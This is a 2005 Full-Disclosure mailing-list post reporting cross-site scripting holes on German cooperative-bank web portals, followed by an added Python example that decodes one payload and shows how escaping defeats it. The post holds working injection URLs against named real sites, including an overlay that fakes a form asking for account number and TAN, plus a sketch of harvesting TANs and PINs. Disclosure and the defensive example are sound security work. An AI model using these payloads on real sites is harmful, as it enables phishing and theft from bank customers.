[Full-disclosure] CSS (Cross Site Scripting) on Germany's second largest financial institute's ebanking portal (Volksbank Raiffeisenbank)
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] CSS (Cross Site Scripting) on Germany's second largest financial institute's ebanking portal (Volksbank Raiffeisenbank)
- From: Constantin Hofstetter <constantin.hofstetter@xxxxxxxxx>
- Date: Thu, 22 Dec 2005 21:02:28 +0100
I emailed the administrators 2 months ago; the only response I got was
something like:
"We will look into it, but we may or may not change anything on the page -
who knows; we won't tell you!"
I called them and the guy on the phone laughed at me.
Here are the links / examples:
*Original:*
https://www.vr-ebanking.de/index.php?RZBK=0280
*My version (CSS):*
https://www.vr-ebanking.de/help;jsessionid=XA?Action=SelectMenu&SMID=EigenesOrderbuch&MenuName=&InitHref=http://www.consti.de/secure
*/Forgery --> Imitation/*
My local bank's website:
http://voba-lindenberg.de/content_suche.php?search=<b>Mysql_Injection?</b>'
http://voba-lindenberg.de/content_suche.php?search=%3Cdiv%20style=z-index:2000;position:absolute;margin-top:-52
The Institute that should secure the financial institute's websites:
http://www.fiducia.de/__C1256CF50056F303.nsf/SearchView/!SearchView&query=AA%22%3E<b>Whatever_You_Like_</b>&SearchMax=10
http://www.fiducia.de/__C1256CF50056F303.nsf/SearchView/%21SearchView&query=AA%22%3E%3Cdiv%20style=z-index:2000;position:absolute;width:90%25;height:90%25;margin:-150px;padding:60px;background:white;%3E%3Ch1%3EKonto%20Erneuern%3C/h1%3E%3Cp%3E%3Ctable%3E%3Ctr%3E%3Ctd%3E%3Cb%3EKontonummer:%3C/b%3E%3C/td%3E%3Ctd%3E%3Cinput%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%3E%3Cb%3ETAN:%3C/b%3E%3C/td%3E%3Ctd%3E%3Cinput%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%3E%3Cbr%3E%3C/td%3E%3Ctd%3E%3Cinput%20type=submit%20value=Aktivieren%3E%3C/td%3E%3C/tr%3E%3C/table%3E%3C/div%3E%3Cinput%20value=%22&SearchMax=10
and so on..
The vr-ebanking site is used by millions of people each day for their daily
financial stuff (ebanking). Someone (phishers) could easily use the CSS
(Cross Site Scripting) to create real-looking websites "within" the domain;
more importantly, they could create a website that does all the true login
stuff (in the background) but sniffs out the TANs and PINs (think snoopy.in,
think curl, think a MySQL database full of working TANs!).
This is not looking too good for my bank, but they don't listen -
--
Constantin Hofstetter
http://www.consti.de
Constantin.Hofstetter@xxxxxxxxx
mailmespam@xxxxxxxxx
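The overlay attack the post describes, worked through as an added example (this is not code from the post, from the bank or from Fiducia): decode the payload carried in the second fiducia.de URL quoted above, render it the way a page that echoes the search term raw would, and compare that with an attribute-escaped rendering. Only the URL is taken from the post; the page template SEARCH_BOX, the two render functions and the tag check are assumptions standing in for the real server-side code.

```python
"""Decode the injected search-term payload from the quoted fiducia.de URL and
show why echoing it unescaped puts a fake "Konto Erneuern" form with
Kontonummer/TAN fields into the page, while HTML attribute escaping reduces
the same bytes to visible text inside the search box.

Added example, not the post's or the bank's code.  FIDUCIA_URL is the link
quoted in the post; SEARCH_BOX, render_unsafe, render_safe and tag_names are
assumed stand-ins for the real server code.
"""
import html
import re
from typing import Optional
from urllib.parse import unquote

# Second fiducia.de link from the post, verbatim.  Lotus Domino style: the
# parameters follow "!SearchView" joined by "&", with no "?" separator.
FIDUCIA_URL = (
    "http://www.fiducia.de/__C1256CF50056F303.nsf/SearchView/%21SearchView"
    "&query=AA%22%3E%3Cdiv%20style=z-index:2000;position:absolute;width:90%25;"
    "height:90%25;margin:-150px;padding:60px;background:white;%3E%3Ch1%3EKonto"
    "%20Erneuern%3C/h1%3E%3Cp%3E%3Ctable%3E%3Ctr%3E%3Ctd%3E%3Cb%3EKontonummer:"
    "%3C/b%3E%3C/td%3E%3Ctd%3E%3Cinput%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%3E%3Cb%3E"
    "TAN:%3C/b%3E%3C/td%3E%3Ctd%3E%3Cinput%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%3E"
    "%3Cbr%3E%3C/td%3E%3Ctd%3E%3Cinput%20type=submit%20value=Aktivieren%3E%3C/td%3E"
    "%3C/tr%3E%3C/table%3E%3C/div%3E%3Cinput%20value=%22&SearchMax=10"
)


def query_param(url: str, name: str) -> Optional[str]:
    """Return the URL-decoded value of parameter `name`, or None if absent.

    The first "&"-separated piece is the path and is skipped; the payload
    itself contains no "&", so a plain split is enough here."""
    for part in url.split("&")[1:]:
        key, _, value = part.partition("=")
        if key == name:
            return unquote(value)
    return None


# Assumed page template: the search term echoed back into the search box,
# i.e. the parameter lands inside a double-quoted HTML attribute.
SEARCH_BOX = '<input type="text" name="query" value="{q}">'


def render_unsafe(q: str) -> str:
    """The reflection the post describes: the parameter is pasted in as-is.
    The payload's leading '">' closes the value attribute and the tag, so the
    <div>/<h1>/<table> overlay becomes live markup, and the trailing
    '<input value="' swallows the template's own closing quote."""
    return SEARCH_BOX.format(q=q)


def render_safe(q: str) -> str:
    """Hardened form: escape &, <, >, " and ' for an attribute context, so the
    payload stays inside the attribute and is shown as literal text."""
    return SEARCH_BOX.format(q=html.escape(q, quote=True))


def tag_names(fragment: str) -> list:
    """Names of the opening tags a browser would see in `fragment`
    (closing tags such as </h1> are deliberately not matched)."""
    return re.findall(r"<([A-Za-z][A-Za-z0-9]*)", fragment)


if __name__ == "__main__":
    payload = query_param(FIDUCIA_URL, "query")
    print("decoded payload:", payload)
    print("unsafe render  :", render_unsafe(payload))
    print("tags (unsafe)  :", tag_names(render_unsafe(payload)))
    print("tags (safe)    :", tag_names(render_safe(payload)))
```

Running it shows the decoded payload starting with `AA"><div style=z-index:2000;position:absolute;...` and ending with `<input value="`; the unsafe rendering yields div, h1, table and four extra input tags (the Kontonummer and TAN fields, the "Aktivieren" button and the quote-swallowing input) as real markup served from the fiducia.de origin, whereas the escaped rendering contains exactly one input tag, the template's own. The same check applies to the voba-lindenberg.de and vr-ebanking.de links in the post: whatever the parameter is, it must be escaped for the context it is echoed into.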
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/